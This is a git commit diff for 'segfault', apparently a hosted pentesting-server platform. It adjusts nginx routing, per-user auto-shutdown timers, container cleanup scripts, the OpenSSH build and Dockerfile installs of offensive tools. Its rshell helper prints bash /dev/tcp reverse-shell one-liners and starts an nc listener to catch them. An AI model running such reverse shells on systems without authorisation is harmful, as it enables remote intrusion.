guest docker bumping
This commit is contained in:
parent
fc10201e80
commit
44f0018fff
|
@ -1,7 +1,10 @@
|
|||
0.5.4 - 2023-02-00
|
||||
* OpenSSH 9.6p1
|
||||
* rshell
|
||||
* sploitscan
|
||||
* OpenVPN (curl sf/vpn)
|
||||
* OpenVPN (curl sf/ovpn)
|
||||
* Different auto-shutdown timers for FREE and TOKEN users
|
||||
* Syscop login message after auto-shutdown
|
||||
|
||||
0.5.2 - 2023-12-00
|
||||
* Kali 2023.4
|
||||
|
|
4
Makefile
4
Makefile
|
@ -119,6 +119,7 @@ FILES_PROVISION += "segfault-$(VER)/provision/update.sh"
|
|||
FILES_ENCFSD += "segfault-$(VER)/encfsd/Makefile"
|
||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/Dockerfile"
|
||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/destructor.sh"
|
||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/funcs_destructor.sh"
|
||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/encfsd.sh"
|
||||
FILES_ENCFSD += "segfault-$(VER)/encfsd/portd.sh"
|
||||
|
||||
|
@ -137,6 +138,7 @@ FILES_GSNC += "segfault-$(VER)/gsnc/sf-gsnc.sh"
|
|||
FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx.conf"
|
||||
FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx-rpc.conf"
|
||||
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/sf.conf"
|
||||
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/timers.conf"
|
||||
FILES_CONFIG += "segfault-$(VER)/config/etc/redis/redis.conf"
|
||||
FILES_CONFIG += "segfault-$(VER)/config/etc/sf/WARNING---SHARED-BETWEEN-ALL-SERVERS---README.txt"
|
||||
FILES_CONFIG += "segfault-$(VER)/config/etc/resolv.conf"
|
||||
|
@ -156,7 +158,7 @@ FILES_ROOT += "segfault-$(VER)/sfbin/funcs.sh"
|
|||
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_redis.sh"
|
||||
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_admin.sh"
|
||||
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_net.sh"
|
||||
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_vpn.sh"
|
||||
FILES_ROOT += "segfault-$(VER)/sfbin/funcs_ovpn.sh"
|
||||
FILES_ROOT += "segfault-$(VER)/sfbin/ovpn_up.sh"
|
||||
FILES_ROOT += "segfault-$(VER)/sfbin/sf"
|
||||
FILES_ROOT += "segfault-$(VER)/sfbin/banhammer.sh"
|
||||
|
|
|
@ -69,13 +69,15 @@ http {
|
|||
gzip off;
|
||||
|
||||
location / {
|
||||
try_files $uri $uri/ = 404;
|
||||
rewrite /net /net/;
|
||||
rewrite /vpn /vpn/;
|
||||
rewrite /wg /wg/;
|
||||
rewrite /dmesg /dmesg/;
|
||||
rewrite /port /port/;
|
||||
rewrite /set /set/;
|
||||
#try_files $uri $uri/ = 404;
|
||||
rewrite ^/net$ /net/ last;
|
||||
rewrite ^/ovpn$ /ovpn/ last;
|
||||
rewrite ^/vpn$ /ovpn/ last;
|
||||
rewrite ^/wg$ /wg/ last;
|
||||
rewrite ^/dmesg$ /dmesg/ last;
|
||||
rewrite ^/port$ /port/ last;
|
||||
rewrite ^/set$ /set/ last;
|
||||
rewrite ^/vpn/(.*)$ /ovpn/$1 last;
|
||||
|
||||
location ~* ^/set/.* {
|
||||
fastcgi_param REMOTE_ADDR $remote_addr;
|
||||
|
@ -101,11 +103,11 @@ http {
|
|||
fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc;
|
||||
fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket;
|
||||
}
|
||||
location ~* ^/vpn/.* {
|
||||
location ~* ^/ovpn/.* {
|
||||
fastcgi_param REMOTE_ADDR $remote_addr;
|
||||
fastcgi_param REQUEST_URI $request_uri;
|
||||
fastcgi_param REQUEST_BODY $request_body;
|
||||
fastcgi_param FCGI_CMD vpn;
|
||||
fastcgi_param FCGI_CMD ovpn;
|
||||
fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc;
|
||||
fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket;
|
||||
}
|
||||
|
|
|
@ -0,0 +1,6 @@
|
|||
#SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36))
|
||||
#SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1))
|
||||
#SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7))
|
||||
#SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36))
|
||||
|
||||
|
|
@ -40,7 +40,7 @@ services:
|
|||
devices:
|
||||
- "/dev/fuse:/dev/fuse"
|
||||
volumes:
|
||||
- "${SF_BASEDIR:-.}/config/db:/config/db:ro"
|
||||
- "${SF_BASEDIR:-.}/config/db:/config/db:rw"
|
||||
- "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro"
|
||||
- "${SF_BASEDIR:-.}/data:/encfs/raw"
|
||||
- "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"
|
||||
|
@ -76,6 +76,7 @@ services:
|
|||
- "/dev/fuse:/dev/fuse"
|
||||
volumes:
|
||||
- "${SF_BASEDIR:-.}/config/db:/config/db:ro"
|
||||
- "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro"
|
||||
- "${SF_BASEDIR:-.}/data:/encfs/raw"
|
||||
- "${SF_SHMDIR:-/dev/shm/sf}/self-for-guest:/config/self-for-guest"
|
||||
- "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"
|
||||
|
|
|
@ -9,4 +9,4 @@ RUN apk add --no-cache --upgrade \
|
|||
encfs \
|
||||
redis \
|
||||
xfsprogs-extra
|
||||
COPY destructor.sh encfsd.sh portd.sh /
|
||||
COPY destructor.sh funcs_destructor.sh encfsd.sh portd.sh /
|
||||
|
|
|
@ -3,149 +3,28 @@
|
|||
# shellcheck disable=SC1091 # Do not follow
|
||||
source /sf/bin/funcs.sh
|
||||
source /sf/bin/funcs_redis.sh
|
||||
|
||||
SF_TIMEOUT_WITH_SHELL=604800
|
||||
SF_TIMEOUT_NO_SHELL=129600
|
||||
|
||||
# Defaults
|
||||
SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36))
|
||||
SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1))
|
||||
SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7))
|
||||
SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36))
|
||||
[[ -n $SF_DEBUG ]] && {
|
||||
SF_TIMEOUT_WITH_SHELL=180
|
||||
SF_TIMEOUT_NO_SHELL=120
|
||||
}
|
||||
|
||||
# [LID] <1=encfs> <1=Container> <message>
|
||||
# Either parameter can be "" to not stop encfs or lg-container
|
||||
stop_lg()
|
||||
{
|
||||
local is_encfs
|
||||
local is_container
|
||||
local lid
|
||||
local ts_born
|
||||
lid="$1"
|
||||
ts_born="$2"
|
||||
is_encfs="$3"
|
||||
is_container="$4"
|
||||
|
||||
LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5"
|
||||
|
||||
red RPUSH portd:cmd "remport ${lid}" >/dev/null
|
||||
rm -f "/sf/run/encfsd/user/lg-${lid}"
|
||||
rm -f "/sf/run/pids/lg-${lid}.pid"
|
||||
rm -f "/sf/run/ips/lg-${lid}.ip"
|
||||
rm -rf "/config/self-for-guest/lg-${lid}"
|
||||
rm -rf "/sf/run/users/lg-${lid}"
|
||||
|
||||
# Kill the OpenVPN process (if running)
|
||||
docker exec sf-master killall "openvpn-$lid" 2>/dev/null
|
||||
docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null
|
||||
|
||||
# Tear down container
|
||||
[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill
|
||||
|
||||
# Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running
|
||||
# inside the container even that we never moved it into the container's
|
||||
# Process Namespace. EncFS will also die when the lg- is shut down.
|
||||
# This is only neede for cgroup1:
|
||||
[[ -n $is_encfs ]] && {
|
||||
pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null
|
||||
# Give kernel time to unmount mountpoint
|
||||
sleep 1
|
||||
}
|
||||
# Do not use 'rm -rf' here as this might still be a mounted drive
|
||||
# when encfsd is not killed fast enough (failing to delete is acceptable).
|
||||
rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt"
|
||||
rmdir "/encfs/sec/lg-${lid}"
|
||||
}
|
||||
|
||||
# [lg-$LID]
|
||||
# Check if lg- is running and
|
||||
# 1. EncFS died
|
||||
# 2. Container should be stopped (stale, idle)
|
||||
check_container()
|
||||
{
|
||||
local c
|
||||
local lid
|
||||
local i
|
||||
local IFS
|
||||
local fn
|
||||
local comm
|
||||
local ts_logout
|
||||
local ts_born
|
||||
IFS=$'\n'
|
||||
|
||||
c="$1"
|
||||
lid="${c#lg-}"
|
||||
|
||||
[[ ${#lid} -ne 10 ]] && return
|
||||
|
||||
ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; }
|
||||
# Skip if EncFS only started recently (zsh not yet started).
|
||||
[[ $((NOW - ts_born)) -lt 20 ]] && return 0
|
||||
|
||||
# Check if EncFS is still running.
|
||||
pgrep -f "^\[encfs-${lid}\]" &>/dev/null || {
|
||||
# NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop')
|
||||
stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..."
|
||||
return
|
||||
}
|
||||
|
||||
# ts_logout may not exist (stale)
|
||||
ts_logout=0
|
||||
fn="/config/db/user/lg-${lid}/ts_logout"
|
||||
[[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn")
|
||||
|
||||
# Check if there is still a shell running inside the container:
|
||||
IFS=""
|
||||
set -o pipefail
|
||||
comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || {
|
||||
# HERE: lg died or top failed.
|
||||
set +o pipefail
|
||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running."
|
||||
return
|
||||
}
|
||||
set +o pipefail
|
||||
# Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare
|
||||
# condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo
|
||||
# will receive a SIGPIPE and exit with 141 and the entire pipe will fail.
|
||||
|
||||
# [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
|
||||
# FIXME: many stale is_logged_in exists without ssh connected ;/
|
||||
|
||||
# HERE: LG & EncFS are running.
|
||||
echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && {
|
||||
# HERE: User still has shell running
|
||||
[[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
|
||||
[[ $((NOW - ts_logout)) -lt ${SF_TIMEOUT_WITH_SHELL} ]] && return
|
||||
# HERE: Not logged in. logged out more than 1 week ago.
|
||||
|
||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)."
|
||||
return
|
||||
}
|
||||
# HERE: No shell running, ts_logout=0 if never logged out
|
||||
|
||||
# Skip if only recently logged out.
|
||||
[[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out.
|
||||
|
||||
# Filter out stale processes
|
||||
echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || {
|
||||
# HERE: Nothing running but stale processes
|
||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running."
|
||||
return
|
||||
}
|
||||
# HERE: Something running (but no shell, and no known processes)
|
||||
|
||||
[[ $((NOW - ts_logout)) -ge ${SF_TIMEOUT_NO_SHELL} ]] && {
|
||||
# User logged out 1.5 days ago. No shell. No known processes.
|
||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${SF_TIMEOUT_NO_SHELL}sec (no shell running)."
|
||||
return
|
||||
}
|
||||
|
||||
# HERE: No shell. No known processes. Less than 1.5 days ago.
|
||||
SF_TIMEOUT_WITH_SHELL=60
|
||||
SF_TIMEOUT_NO_SHELL=15
|
||||
SF_TIMEOUT_TOKEN_WITH_SHELL=120
|
||||
SF_TIMEOUT_TOKEN_NO_SHELL=90
|
||||
}
|
||||
|
||||
[[ ! -S /var/run/docker.sock ]] && ERREXIT 255 "Not found: /var/run/docker.sock"
|
||||
source /funcs_destructor.sh || ERREXIT 255
|
||||
|
||||
export REDISCLI_AUTH="${SF_REDIS_AUTH}"
|
||||
|
||||
while :; do
|
||||
sleep 30
|
||||
source /config/etc/sf/timers.conf 2>/dev/null
|
||||
source /funcs_destructor.sh 2>/dev/null
|
||||
NOW=$(date +%s)
|
||||
# Every 30 seconds check all container we are tracking (from encfsd)
|
||||
containers=($(cd /sf/run/encfsd/user && echo lg-*))
|
||||
|
|
|
@ -0,0 +1,153 @@
|
|||
|
||||
# [LID] <1=encfs> <1=Container> <message>
|
||||
# Either parameter can be "" to not stop encfs or lg-container
|
||||
stop_lg()
|
||||
{
|
||||
local is_encfs
|
||||
local is_container
|
||||
local lid
|
||||
local ts_born
|
||||
lid="$1"
|
||||
ts_born="$2"
|
||||
is_encfs="$3"
|
||||
is_container="$4"
|
||||
|
||||
LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5"
|
||||
|
||||
red RPUSH portd:cmd "remport ${lid}" >/dev/null
|
||||
rm -f "/sf/run/encfsd/user/lg-${lid}"
|
||||
rm -f "/sf/run/pids/lg-${lid}.pid"
|
||||
rm -f "/sf/run/ips/lg-${lid}.ip"
|
||||
rm -rf "/config/self-for-guest/lg-${lid}"
|
||||
rm -rf "/sf/run/users/lg-${lid}"
|
||||
|
||||
# Kill the OpenVPN process (if running)
|
||||
docker exec sf-master killall "openvpn-$lid" 2>/dev/null
|
||||
docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null
|
||||
|
||||
# Tear down container
|
||||
[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill
|
||||
|
||||
# Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running
|
||||
# inside the container even that we never moved it into the container's
|
||||
# Process Namespace. EncFS will also die when the lg- is shut down.
|
||||
# This is only neede for cgroup1:
|
||||
[[ -n $is_encfs ]] && {
|
||||
pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null
|
||||
# Give kernel time to unmount mountpoint
|
||||
sleep 1
|
||||
}
|
||||
# Do not use 'rm -rf' here as this might still be a mounted drive
|
||||
# when encfsd is not killed fast enough (failing to delete is acceptable).
|
||||
rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt"
|
||||
rmdir "/encfs/sec/lg-${lid}"
|
||||
}
|
||||
|
||||
try_syscop_msg() {
|
||||
local lid="$1"
|
||||
echo -en "\
|
||||
🤷♂️ ${CDM}Your server shut down automatically because you did not log in for $(( (NOW - ts_logout) / 60 / 60 )) h.
|
||||
🫵 Please type ${CDC}halt${CDM} to stop your server or...
|
||||
❤️ ...get a ${CM}TOKEN${CDM} to stop this message: ${CUL}${CB}https://thc.org/sf/token${CN}${CDM}
|
||||
|
||||
🌈 ${CW}Yours sincerely, The SysCops 😘 ${CN}
|
||||
">"/config/db/user/lg-${lid:?}/syscop-msg.txt"
|
||||
}
|
||||
|
||||
# [lg-$LID]
|
||||
# Check if lg- is running and
|
||||
# 1. EncFS died
|
||||
# 2. Container should be stopped (stale, idle)
|
||||
check_container()
|
||||
{
|
||||
local c
|
||||
local lid
|
||||
local IFS=$'\n'
|
||||
local fn
|
||||
local comm
|
||||
local ts_logout
|
||||
local ts_born
|
||||
local to_with_shell=$SF_TIMEOUT_WITH_SHELL
|
||||
local to_no_shell=$SF_TIMEOUT_NO_SHELL
|
||||
local is_token
|
||||
|
||||
c="$1"
|
||||
lid="${c#lg-}"
|
||||
|
||||
[[ ${#lid} -ne 10 ]] && return
|
||||
|
||||
ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; }
|
||||
# Skip if EncFS only started recently (zsh not yet started).
|
||||
[[ $((NOW - ts_born)) -lt 20 ]] && return 0
|
||||
|
||||
# Check if EncFS is still running.
|
||||
pgrep -f "^\[encfs-${lid}\]" &>/dev/null || {
|
||||
# NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop')
|
||||
stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..."
|
||||
return
|
||||
}
|
||||
|
||||
# ts_logout may not exist (stale)
|
||||
ts_logout=0
|
||||
fn="/config/db/user/lg-${lid}/ts_logout"
|
||||
[[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn")
|
||||
|
||||
# Check if there is still a shell running inside the container:
|
||||
IFS=""
|
||||
set -o pipefail
|
||||
comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || {
|
||||
# HERE: lg died or top failed.
|
||||
set +o pipefail
|
||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running."
|
||||
return
|
||||
}
|
||||
|
||||
# Load timers
|
||||
[[ -e "/config/db/user/lg-${lid}/token" ]] && {
|
||||
to_with_shell=$SF_TIMEOUT_TOKEN_WITH_SHELL
|
||||
to_no_shell=$SF_TIMEOUT_TOKEN_NO_SHELL
|
||||
is_token=1
|
||||
}
|
||||
set +o pipefail
|
||||
# Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare
|
||||
# condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo
|
||||
# will receive a SIGPIPE and exit with 141 and the entire pipe will fail.
|
||||
|
||||
# [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
|
||||
# FIXME: many stale is_logged_in exists without ssh connected ;/
|
||||
|
||||
# HERE: LG & EncFS are running.
|
||||
echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && {
|
||||
# HERE: User still has shell running
|
||||
[[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
|
||||
[[ $((NOW - ts_logout)) -lt ${to_with_shell} ]] && return
|
||||
# HERE: Not logged in. logged out more than 1 week ago.
|
||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)."
|
||||
[[ -z $is_token ]] && try_syscop_msg "$lid"
|
||||
|
||||
return
|
||||
}
|
||||
# HERE: No shell running, ts_logout=0 if never logged out
|
||||
|
||||
# Skip if only recently logged out.
|
||||
[[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out.
|
||||
|
||||
# Filter out stale processes
|
||||
echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || {
|
||||
# HERE: Nothing running but stale processes
|
||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running."
|
||||
return
|
||||
}
|
||||
# HERE: Something running (but no shell, and no known processes)
|
||||
|
||||
[[ $((NOW - ts_logout)) -ge ${to_no_shell} ]] && {
|
||||
# User logged out 1.5 days ago. No shell. No known processes.
|
||||
|
||||
stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${to_no_shell}sec (no shell running)."
|
||||
[[ -z $is_token ]] && try_syscop_msg "$lid"
|
||||
|
||||
return
|
||||
}
|
||||
|
||||
# HERE: No shell. No known processes. Less than 1.5 days ago.
|
||||
}
|
|
@ -614,11 +614,11 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6
|
|||
&& /pkg-install.sh HACK ghbin 'theaog/spirit' 'spirit%arch:x86_64=:DEFAULT=SKIP%.tgz$' spirit `# x86_64 only, spirit-arm bad` \
|
||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/gf@latest \
|
||||
&& mkdir -p /usr/share/gf \
|
||||
&& svn export https://github.com/tomnomnom/gf/trunk /tmp/gf \
|
||||
&& git clone --depth 1 https://github.com/tomnomnom/gf.git /tmp/gf \
|
||||
&& mv /tmp/gf/examples/*.json /usr/share/gf \
|
||||
&& mv /tmp/gf/gf-completion.* /usr/share/gf \
|
||||
&& rm -rf /tmp/gf \
|
||||
&& svn export https://github.com/1ndianl33t/Gf-Patterns/trunk/ /tmp/gf \
|
||||
&& git clone --depth 1 https://github.com/1ndianl33t/Gf-Patterns.git /tmp/gf \
|
||||
&& mv /tmp/gf/*.json /usr/share/gf; }' \
|
||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/hacks/inscope@latest; }' \
|
||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/Emoe/kxss@latest; }' \
|
||||
|
@ -631,7 +631,8 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6
|
|||
&& cmake . \
|
||||
&& make \
|
||||
&& cp urldedupe /usr/bin; }' \
|
||||
&& /pkg-install.sh HACK bash -c '{ svn export https://github.com/urbanadventurer/username-anarchy/trunk /opt/username-anarchy; }' \
|
||||
&& /pkg-install.sh HACK bash -c '{ git clone --depth 1 https://github.com/urbanadventurer/username-anarchy.git /opt/username-anarchy \
|
||||
&& rm -rf /opt/username-anarchy/.git*; }' \
|
||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/damit5/gitdorks_go@latest; }' \
|
||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/dsieve@master; }' \
|
||||
&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/enumerepo@latest; }' \
|
||||
|
@ -802,8 +803,8 @@ RUN /pkg-install.sh HACK ghbin ekzhang/bore '%arch:aarch64=arm%-unknown-linux'
|
|||
&& /pkg-install.sh HACK bin 'https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb' `# x86_64 only` \
|
||||
&& /pkg-install.sh HACK bin 'https://github.com/xaitax/SploitScan/raw/main/sploitscan.py' sploitscan \
|
||||
&& /pkg-install.sh HACK ghbin hueristiq/xurlfind3r 'linux_%arch:x86_64=amd64:aarch64=arm64%' xurlfind3r
|
||||
RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker 'linux' kalker \
|
||||
&& /pkg-install.sh LARGE ghbin PowerShell/PowerShell 'deb_%arch1%.deb'
|
||||
RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker 'linux' kalker
|
||||
## YANKED. Already in apt-get install powershell/pkg-install.sh LARGE ghbin PowerShell/PowerShell 'deb_%arch1%.deb'
|
||||
RUN /pkg-install.sh HACK bash -c '{ wget -O "/usr/bin/favfreak.py" https://raw.githubusercontent.com/devanshbatham/FavFreak/master/favfreak.py \
|
||||
&& chmod 755 /usr/bin/favfreak.py \
|
||||
&& ln -s favfreak.py /usr/bin/FavFreak; }' \
|
||||
|
|
|
@ -293,8 +293,10 @@ alias nocol=noansi
|
|||
# Make the Project name visibile in the PS1 prompt
|
||||
[[ -z $VIRTUAL_ENV ]] && VIRTUAL_ENV="${SF_PRJ}"
|
||||
|
||||
PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:$PATH"
|
||||
|
||||
PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:/usr/local/go/bin:$PATH"
|
||||
[[ -d /usr/share/doc/python3-impacket/examples ]] && PATH="${PATH}:/usr/share/doc/python3-impacket/examples"
|
||||
export PATH
|
||||
|
||||
_sf_info_non_perm()
|
||||
{
|
||||
|
|
|
@ -16,31 +16,31 @@ ERREXIT() {
|
|||
exit "${code:-99}"
|
||||
}
|
||||
|
||||
[[ ! -f /config/self/reverse_port ]] && curl sf/port
|
||||
load rport /config/self/reverse_port || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
|
||||
load rip /config/self/reverse_ip || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
|
||||
echo -e "\
|
||||
Use any of these commands on the remote system:${CDR}
|
||||
bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &'
|
||||
(bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &
|
||||
${CN}
|
||||
Once connected, cut & paste this into the remote shell:${CDC}
|
||||
Use one of these commands on the remote system:
|
||||
1. ${CDR}bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &'${CN}
|
||||
2. ${CDR}(bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &${CN}
|
||||
${CN}Once connected, cut & paste the following into the _this_ shell:
|
||||
${CF}-------------------------------------------------------------------------------${CDC}
|
||||
command -v python >/dev/null \\
|
||||
&& exec python -c 'import pty; pty.spawn(\"bash\")' \\
|
||||
|| exec script -qc bash /dev/null
|
||||
|
||||
export SHELL=/bin/bash
|
||||
export TERM=xterm-256color
|
||||
&& exec python -c 'import pty; pty.spawn(\"bash\")' \\
|
||||
|| exec script -qc bash /dev/null
|
||||
export SHELL=/bin/bash TERM=xterm-256color
|
||||
reset -I
|
||||
PS1='"'\[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"'
|
||||
"'stty -echo;printf "\\033[18t";read -rdt R;stty sane $(echo "$R"|awk -F";" '"'"'{ printf "rows "$3" cols "$2; }'"'"')'"
|
||||
${CN}To force-exit this shell, type ${CDY}kill \"\$(pgrep -P $$)\"${CN}
|
||||
-----------------------------------"
|
||||
${CN}${CF}-------------------------------------------------------------------------------${CN}
|
||||
To force-exit this listener, type ${CDY}kill \"\$(pgrep -P $$)\"${CN} on your Root Server"
|
||||
# PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] '
|
||||
|
||||
cfg=$(stty --save)
|
||||
stty raw -echo opost
|
||||
time nc -vnlp "$rport"
|
||||
echo "Restoring TTY"
|
||||
echo -e "${CDG}Listening on ${CG}${rip}:${rport}${CN}"
|
||||
nc -nlp "$rport"
|
||||
echo "🦋 Restoring terminal..."
|
||||
stty "$cfg"
|
||||
# reset -I
|
||||
|
||||
|
|
|
@ -1,29 +1,34 @@
|
|||
|
||||
VER=9.6p1
|
||||
|
||||
all: albuild fs-root/bin/docker-exec-sigproxy fs-root/bin/unix-socket-client fs-root/usr/sbin/sshd Dockerfile
|
||||
docker build --no-cache --network host -t sf-host .
|
||||
|
||||
albuild:
|
||||
bash -c "docker run --rm alpine-gcc true || \
|
||||
docker commit alpine-gcc alpine-gcc || { \
|
||||
docker run --network host --name alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \
|
||||
&& docker commit alpine-gcc alpine-gcc; }"
|
||||
bash -c "docker run --rm sf-alpine-gcc true || \
|
||||
docker commit sf-alpine-gcc sf-alpine-gcc || { \
|
||||
docker run --network host --name sf-alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \
|
||||
&& docker commit sf-alpine-gcc sf-alpine-gcc; }"
|
||||
|
||||
# See mk_sshd.sh for manual debugging
|
||||
fs-root/usr/sbin/sshd: sf-sshd.patch mk_sshd.sh
|
||||
docker run --rm -v$$(pwd):/src --net=host -w /tmp alpine-gcc /src/mk_sshd.sh
|
||||
fs-root/usr/sbin/sshd: albuild sf-sshd.patch mk_sshd.sh
|
||||
docker run --rm -v$$(pwd):/src --net=host -w /tmp --env VER=$(VER) sf-alpine-gcc /src/mk_sshd.sh
|
||||
@echo "Type 'make diff' to create a sf-sshd-$(VER).patch"
|
||||
|
||||
fs-root/bin/docker-exec-sigproxy: docker-exec-sigproxy.c
|
||||
docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c
|
||||
docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c
|
||||
@echo SUCCESS
|
||||
|
||||
fs-root/bin/unix-socket-client: unix-socket-client.c
|
||||
docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c
|
||||
docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c
|
||||
@echo SUCCESS
|
||||
|
||||
diff:
|
||||
cd dev && \
|
||||
diff -x '!*.[ch]' -u openssh-9.2p1-orig/ openssh-9.2p1-sf/ | grep -Ev ^"(Only in|Common)" >../sf-sshd.patch
|
||||
diff -x '!*.[ch]' -u openssh-$(VER)-orig/ openssh-$(VER)-sf/ | grep -Ev ^"(Only in|Common)" >../sf-sshd-$(VER).patch
|
||||
